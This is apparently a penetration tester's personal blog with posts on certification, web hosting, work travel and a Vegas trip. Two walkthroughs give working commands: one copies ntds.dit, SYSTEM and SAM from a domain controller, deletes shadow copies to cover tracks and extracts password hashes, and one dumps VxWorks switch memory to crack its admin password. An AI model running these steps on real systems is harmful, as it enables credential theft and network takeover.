Passed the GWAPT cert

I took the SANS GIAC Web Application Penetration Tester (GWAPT) class back in December of 2014 in Washington DC with Eric Conrad. Have been procrastinating for several months before I had to finally break down and take the certification before my time expired in late April 2015.
Spent a few days going over the books to refresh me on the content that we went over, and took one of the practice exams and actually did not do too well on it. Never taking a SANS cert before I was not sure what to expect, and probably should have actually allowed for the 2 hours to sit the practice test. Rushed though it and guessed a lot of the questions, and did not remember going of half of the info. (Note to self actually read the questions and each answer and not just say that looks good.) Overall I was a little frustrated after the first  practice exam, since I have been doing this for about 3 years now, and many of the questions seemed to be based on opinion, and not actual facts. Several of the questions had more to do with general penetration testing then actually web application testing, like needing to know the TTL from a DNS request for a domain name.
So read the books a few more days before taking the second practice test, which I did much better on, since I had some idea on what to expect on the test.Did rush though it again actually did the entire test in 48 minutes. Which is really not that great, but I just wanted to make sure I had some idea what they real test would be like. Two days later I sat for the actual GWAPT test, and planned to take my time and read every question throughly.
Sat for the exam on April 9, 2015. Finished the test and passed it fairly easily, but was some what perplexed that it had nothing similar to the practice tests. It seemed the the practice exams had nothing to do with the the actual exam. Many of the questions were topics that were in the books, but never brought up in the practice tests. Which frustrated me a little, since I had to spend a little more time looking for some of the answers, that I had not really gone over previously.
So anyone planning on sitting the exam, and that has not taken a SANS cert before, plan accordingly to make sure you know all of the content in the books. Do not expect that the practice exams will actually prepare you for the real test, it might actually make you study information that is never asked on the exam.

Moving to Google Domains from 1and1.com

Well I am moving some of my domains to the Beta Google Domains, away from 1and1.com hosting. It has not been completely the easiest thing to do, I have unlocked my domains and disabled private registration. However, I have several sites that were still be locked an hour of changing their status. All of them finally were released to allow me to request the transfer to Google.
One main reason I am moving from 1and1.com is they continually raise their prices, and I am not a business so I do not make money from any of my sites. The other is that their mail services have become awful, unless you want move to their newer exchange mail service for a $5 per account/per month fee.
I have used them for about eight years, and originally started with their beginner package for $2.99 per month, but it is now up to $4.99 per month. While They do add some features, it seems that they make others worse for the older subscribers who do not upgrade to a better package.
The new MyWebsite package is $6.99 a month, with a few more options then I currently have, and I am guessing that my account will soon receive a price update to be closer to that price. Along with the price updates to all domain names I have registered, they use to cost me between $6.99 to $8.99, and are now all $14.99 per domain. Since I have 17 domains, that has made a drastic price increase to my costs to host websites. Another thing they pissed me off about was they sent a notice that they were discontinuing the use of PHP 5.2, so I migrated all of my systems to 5.4 or 5.5. They forgot to mention that I needed to discontinue the support for 5.2 in my billing, and billed me $4.99 for a month of support. They never mentioned that I had to do this or that it was added to my billing and I have to remove it.
Had always had an issue with the 1and1.com limited MySQL DB support, only allowing 100MB of data in one database is a little crappy. Especially when I can have a bunch of DB instances but only 100MB on each one, it makes it a pain to have to program to use multiple DB instances on a web site.
Transferred nine domains and was notified that it takes 5 days for 1and1.com to transfer the domain to the new provider, they stat that: “1&1 will release the domain after five(5) days as required by ICANN if there are no restrictions, disputes, etc.” I guess I will have to wait and see how things will be at Google, and will give me sometime to figure out what I want to point the domain names to. I have moved one to Bitbucket repo already, and will just keep it pointed there once it is moved.
Will see how things go, and will need to move six more domains, but they are all used for email, and am not sure how long the outage will be on them. I will have to test one to see how things go, and what the outage on email will be. Then I have one that is tied to the main account for 1and1.com, and not sure how that will work to transfer it since it is tied to the hosting package. It is also the domain that is hosting this blog, so I will need to figure out where to host this site that will have access to PHP and MySQL, to allow me to host a couple web applications.

Bahrain – Working for another manager is trying my patience

Well I am almost done with my small tour in Bahrain, and will be glad to be home. I will miss some of the people, they are great and were a joy to work with.
As for the project that my company is contracted on, I am a little pissed that nothing has really been done, since I last left from working over here. Well none of the projects that we were supposed to be working on. Many of the other vendors that had projects have finished, or are scheduled to finish their projects. It seems that the manager in charge has either not worried about the project or is clueless that his employees are lying to him.
The two people that were hired to come over here and work for the last year, which are not security minded people by the way, did almost nothing during the time they were over here. From what I can tell, it looks like they relied on other vendors to do most of the work and they took all of the credit for it. Most of the projects are not even actually started, but are marked as partially complete. I have been working on a Bit9 installation for a couple of weeks, there are 1200+ workstations in the environment, and only 130 systems have the software installed. There are no real policies defined, and  only two workstations are locked down. The manager believes that all systems have the software installed and they are completely protected, I tried to let him know, and he did not see to want to hear it. I dropped the conversations and began working on a solution to the issue.
I am ready to get back to pentesting, where I can actually do some good, well I will keep telling my self that. Many of my customers, just want a band-aid to cover over the problems, and not really work on fixing things, but I still get to have fun in the process.

Heading back to Bahrain for my 3rd Trip

Heading out Monday July 21st to Bahrain for another 45 days of excitement in Bahrain. My company was renting an apartment since last year, but they let the lease lapse, so I will be staying in the Marriott for the stays. Which is fine with me, I like getting the points, and plus it has free breakfast. I guess they are expecting for me to look for another apartment to rent, not sure why the last person who was there did not do this, since he works on the project full time (or is supposed to).
No sure what I will be working on this time around, since I have not been involved with this project since last year when I was there. Have had little information given to me from the director of this project, and the employees assigned to the director of this project have been little help giving me information.
Did not really want to head back, but my boss sort of gave me a “you do not really have an option” speech. I was supposed to heading to Defcon during this time frame and told him I would prefer to that that then to Bahrain. I was then told that was not a good reason to not go on the trip, and something like “I cannot justify you going to training instead of this trip” or something similar to that. This did not really make me happy, and they originally wanted me to go for 90 days, but I had to do military duty so I could only squeeze in the 45 days to go (well that is what I told them). Not like they could really argue about me not being able to go, since it is the federal government and all.
I was surprised that they were expecting me to cover this time frame for the project, but it seems that one of the two people they hired does not want to go back over there anymore. I was a little pissed about that, and think they need to fire him since he was specifically hired to do this project. Sure that will not happen, since they have him doing training for Alien Vault software occasionally.
This is partly one reason I started researching penetration testing companies. Have found a few I like, but not sure if I will be looking for a new place to work just yet. Need to see if they are expecting me to make more trips back to Bahrain. I already told my director that I would not be heading back over already, so to not even ask me about it.

Getting Hashes from NTDS.dit file

Read a writeup from @Mubix about doing this and noticed that some changes had come to the NTDSxtract software which made things a little easier, so I decided to do a write up on on the two versions
Why do you want to do this anyways?
The reason you would want to pull the ntds.dit file from a Domain Controller after you have compromised it is because you do not want to create a new Domain Administrator account (could set off alerts) and need password hashes; or you need a password for another account to access data you want (ie. SQL Server accounts).

Get the ntds.dit and SYSTEM from Volume Shadow Copy on a Domain Controller

1. Vssadmin tool

1.1 List Volume Shadow Copies on the system:

Example: ‘vssadmin list shadows’ no Shadows Available
C:>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line too
(C) Copyright 2001 Microsoft Corp.
No items found that satisfy the query.

1.2. Create a new Volume Shadow Copy of the current drive:

Example: ‘vssadmin create shadow’ copy:
C:>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.
Successfully created shadow copy for ‘c:’
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \?GLOBALROOTDeviceHarddiskVolumeShadowCopy1

2. Pull files from the Volume Shadow copy

copy \?GLOBALROOTDevice<SHADOWYCOPY DISK>windows<directory><File> <where to put file>
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowsntdsntds.dit .
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSYSTEM .
copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy[X]windowssystem32configSAM .
 [X] Refers to the shadow copy number, in the examples above the latest versions is HarddiskVolumeShadowCopy1 (there could be multiple copies, use the last one listed)
I would also recommend getting a current copy of SYSTEM from the registry just in case.
reg SAVE HKLM/SYSTEM c:SYS
I have had a couple times where the SYSTEM file from the shadow copy was corrupt.

3. Delete the shadows to cover your tracks:

vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
vssadmin delete shadows /for=C: /shadow= e8eb7931-5056-4f7d-a5d7-05c30da3e1b3

4. Optional VSSOwn Script to help with this task:

http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs

5. Now that you have the files, it is time to get the hashes

5.1 Utilities needed:

  • libesedb
  • ntdsxtract

5.2 libesedb

https://code.google.com/p/libesedb/
http://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz

Extract the files

# tar -xzvf libesedb-alpha-20120102.tar.gz

Compile/make libesedb

# cd libesedb-20120102
# ./configure
# make
Need to move this somewhere like ‘/usr/local/’
# mv esedbtools/ /usr/local
# cd esedbtools/

esedbexport usage:

Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file

Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
[ -T table_name ] [ -hvV ] source
source: the source file
-c:     codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h:     shows this help
-l:     logs information about the exported items
-m:     export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t:     specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T:     exports only a specific table
-v:     verbose output to stderr
-V:     print version

Run esedbexport to extract ntds.dit data :

./esedbexport  -t  <Directory to export data to(will add .export to the end)> <ntds.dit file>
# ./esedbexport  -t ~/ntds ~/ntds.dit
esedbexport 20120102
Opening file.

Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.

Extracted files:

# ls ~/ntdis.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

5.3 NTDSXtract:

http://www.ntdsxtract.com/
http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_2_beta.zip
# unzip ntdsxtract_v1_0.zip
# cd NTDSXtract 1.0/
To update to the new 1.2 Beta version unzip the contents in side the “NTDSXtract 1.0”
(You might want to rename the directory to just NTDSXtract)
# unzip ntdsxtract_v1_2_beta.zip

Usage for dsuser.py (Version 1.0 and 1.2 Beta)

Ver 1.0
 # python dsusers.py
DSUsers
Extracts information related to user objects
usage: dsusers.py <datatable> <linktable> [option]
options:
--rid <user rid>
List user identified by RID
--name <user name>
List user identified by Name
--passwordhashes <system hive>
Extract password hashes
--passwordhistory <system hive>
Extract password history
--certificates
Extract certificates
--supplcreds <system hive>
Extract kerberos keys
--membership
List groups of which the user is a member
Ver 1.2
 # python ../NTDSXtract 1.0/dsusers.py 
DSUsers v1.2
Extracts information related to user objects
usage: ../NTDSXtract 1.0/dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
  linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its
cache files and output files. If the directory does not exist
it will be created.

options:
--rid <user rid>
List user identified by RID
--name <user name>
List user identified by Name
    --syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
--lmoutfile    <name of the LM hash output file>
--ntoutfile      <name of the NT hash output file>
--pwdformat  <format of the hash output>
ophc - OphCrack format
When this format is specified the NT output file will be used
john - John The Ripper format
--passwordhashes
Extract password hashes
    --passwordhistory
Extract password history
--certificates
Extract certificates
--supplcreds
Extract kerberos keys
--membership
List groups of which the user is a member
--csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the output

Extract user info:

Ver 1.0
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 --passwordhashes ~/sys --passwordhistory ../sys
Running with options:
Extracting password hashes
Extracting password history
Initialising engine...
Scanning database - 100% -> 40933 records processed
Extracting schema information - 100% -> 4142 records processed
Extracting object links...

List of users:
==============
Record ID:           1815
User name:           Administrator
User principal name: Administrator@DOMAIN
SAM Account name:    Administrator
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 3543ea4c-f755-4758-97c0-3d63dffc96ad
SID:  S-1-5-21-657512695-1375287660-316888650-500
When created:         2004-01-16 19:31:25
When changed:         2013-10-03 16:10:29
Account expires:      Never
Password last set:    2006-08-22 11:53:34.828125
Last logon:           2013-10-03 19:11:25.366397
Last logon timestamp: 2013-09-30 10:43:09.479359
Bad password time     2013-10-03 17:36:20.168265
Logon count:          65535
Bad password count:   0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ priv DOMAIN main Domain Admins Administrator
Password hashes:
    Administrator:$NT$0817033191709a45c93baa986d933d0e:::
Password history:
    Administrator_nthistory0:$NT$0817033191709a45c93baa986d933d0e:::
    Administrator_nthistory1:$NT$70aa17fabbaf3b0511f430844c6de431:::
    Administrator_lmhistory0:f8eab0fa471aff3edab057c59e5d0aa5:::
Record ID:           1816
User name:           Guest
User principal name:
SAM Account name:    Guest
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 2e792141-c4be-43b2-a4f5-079e5d05e184
SID:  S-1-5-21-657512695-1375287660-316888650-501
When created:         2004-01-16 19:31:25
When changed:         2013-10-03 15:19:28
Account expires:      Never
Password last set:    Never
Last logon:           Never
Last logon timestamp: Never
Bad password time     2013-10-03 18:18:45.096975
Logon count:          0
Bad password count:   1
User Account Control:
Disabled
PWD Not Required
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ priv DOMAIN main Users Guest
Password hashes:
Password history:
….(Continues for each Account)….
Ver 1.2 (Output in JTR Format)
python dsusers.py ~/ntds.export/datatable.3  ~/ntds.export/link_table.4 ~/TEMP  --passwordhashes --passwordhistory --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

List of users:
==============
Record ID:           32777
User name:           joe smith
User principal name: email@address.net
SAM Account name:    jsmith
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 14c15e2a-8f7c-4404-a63c-cb6a4c689c00
SID:  S-1-5-21-349701255-3731294407-2303513147-3800
When created:         2005-06-01 13:50:37
When changed:         2013-12-12 15:08:12
Account expires:      Never
Password last set:    2013-10-07 13:20:19.146593
Last logon:           2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time     2013-12-11 00:04:52.446209
Logon count:          6239
Bad password count:   0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users joe smith
Password hashes:
name:$NT$2e8fc4b95229a6ea67b1f69d04ee4000:::
name:e4c2436ddd1f655c6eedd0fa5525f000:::
….(Continues for each Account)….
Version 1.2 allows you to extract the hashes into two files, one for LM hashes the other for NT hashes, and currently supports two hash output types; Ophcrack and John.

VxWorks Memory Dump

While running an internal vulnerability scan I noticed that one of the devices was showing vulnerable to VxWorks Memory Dump.
This is exploitable by using the Metasploit wdbrpc_memory_dump module, so I fired it up and loaded the module to see if I could pull the memory from this device.
vxworks
I run the exploit against the system and it began dumping the memory, and it got to about 31% before stopping, so I had to restart it from the OFFSET value it stopped at. This happened 3 more times before it finished. The output file was about 256MB in size, so I was not sure if it had good information from the system or just crap.
Being that it was a hex dump of the memory, I ran strings against the file to get a list of information and look for possible information to use. I put the output into another file to search through with “grep”.
            #strings vxworks_memory.dmp > strings.memory.dmp
I was able to determine that it was a network switch from viewing the IP address on port 80 (looked back at Nessus to see what ports where open and what it thought the device was), so I decided to search for words like “password”, “enable”, and “encryption”.
At first nothing showed up that was any good or valuable to use, so I decided to search for partial words, like “assw”, “able” and “crypt” to see if the words had been split across lines in the memory dump.
            #cat strings.memory.dmp | grep -i assw
            #cat strings.memory.dmp | grep -i crypt
I discovered that the enable hash was in the dump, so I guessed that the password could also be stored in there as well.
Taking the new file from the strings output (strings.memory.dmp), I ran it through “sort” with the unique flag and output that into another file to use as my password list starting point.
            #cat strings.memory.dmp | sort –u > passlist.list
With new list of possible passwords, and hoping that one copy of it was completely intact and not split across a line. I ran it through PW-Inspector to narrow it down to a more manageable number and realistic passwords and an actual realistic length.
            #pw-inspector –I passlist.list –o passlist.uniq.list –lunps –m 8 –M 16
Now that I had narrowed the password list down to a more manageable solution, I ran John against the hash with the shorter list.
john_vxworks
In no time at all I had the password for the hash, the switch was not Cisco and was only using an MD5 hash, which made it rather simple to crack.
Now that I had the password, I needed to search for a user name. So I started searching for common names in the file, and admin came back multiple times with the word user next to it, so with a little searching on Google, I discovered that admin was the default user on this switch.
From there I tried to SSH to the switch, but was denied due to the use of private keys and not passwords for SSH, so I tried telnet to connect to the switch and was able to login.
From there I had access to see all of the other VLANS, and IP address space that I did not have access to before. Now time to see where  else the password is used.

Fun times during NVA/PT assessments over the past 3 months

Some fun things I have had to deal with during some NVA/PT assessments for customers over the past 3 months.
You begin scanning 5 hosts and the customers switch rolls over, everything stops responding, and the customer calls you asking what you did.
I enjoy customers that leave usernames and passwords for critical systems on a web page with unauthenticated access, and they say that it is not a security vulnerability.
You find access to a customers Github.com site and your boss tells you to not explore the site and only report that you had access to login, since the site was not in scope.
You report a finding that you found last year for the same customer, and it allows you complete access to the server.
You find default access to a website that controls the customers network switches, UPS, and other main pieces of their infrastructure, and the customer says he is not worried about.
You find systems that are missing patches from 2004, and the customer tells you that it is not critical. You tell them to remove it from the network, and they tell you they need it for some other system that is important.
I am sure I will have more to come in the next few months, since my boss is stacking up assessments like they are going out of style, and we are still trying to hire a new pentester.

My First Vegas Trip

Vegas for my birthday!
My twin sister decided my wife and I needed to meet her and her husband in Las Vegas for our birthday, and have a long weekend enjoying the place.
While I like to travel, and this being my first trip to Vegas, I can say that it is not on my top list of places to visit. There are several issues I have with Vegas, all are  just personal preferences about what I like to do, see and not be subjected to.
List of things I do not like about Vegas:
  1. Cigarette smoke (I cannot stand having to walk through the casino floor)
  2. Being around drunk people (generally they act really stupid and annoying)
  3. large crowds (especially when many of them are drunk and acting stupid)
  4. Someone trying to hand me something all the time (I really do not want to go to the strip club)
  5. People asking if I want to see a show about every 10 feet. (If I wanted to see a show I would purchase some tickets)
  6. I am not a gambler (I can waste my money on better things)
    (If I did gamble I could not stand being in a smoke filled room doing it)
I did enjoy some parts of Vegas, but there are many I cannot stand.
There are a lot of neat things to see in Vegas, some interesting shows to watch (most are way over priced), and the hotels have very elaborate themes.
List of things I did like about Vegas:
  1. The hotel decor (Cesar Palace, The Belagio, The Venetian, etc…)
  2. The wide selection of places to eat (ones that I have not been to before)
  3. Visiting Hoover Dam (which was probably the most exciting part of the whole trip)(I know it is not in Vegas)
  4. The shops/stores (mainly ones that we do not have locally)
The Hotel:
I was not impressed with the NY NY hotel, I think it is overpriced, and the accommodations are lacking. It is no better that staying in a Holiday Inn Express except it costs more.
You are charged a 20 per day resort fee, which makes the seemingly decent price for the room, not worth the stay. your $79 room turns into a $110 room after fees and taxes.
The food selection in the hotel was very lacking, and not really New York-ish, sure it had Nathans Hot dogs, a pizza place, an Irish Bar. It did not have a deli sandwich shop, coffee carts, and many other things you would really associate with New York.
Well enough complaining about Las Vegas, some people seem to really enjoy it, and I guess other can careless about the place. So if you like Vegas, go and have your fun, but I will be going somewhere else.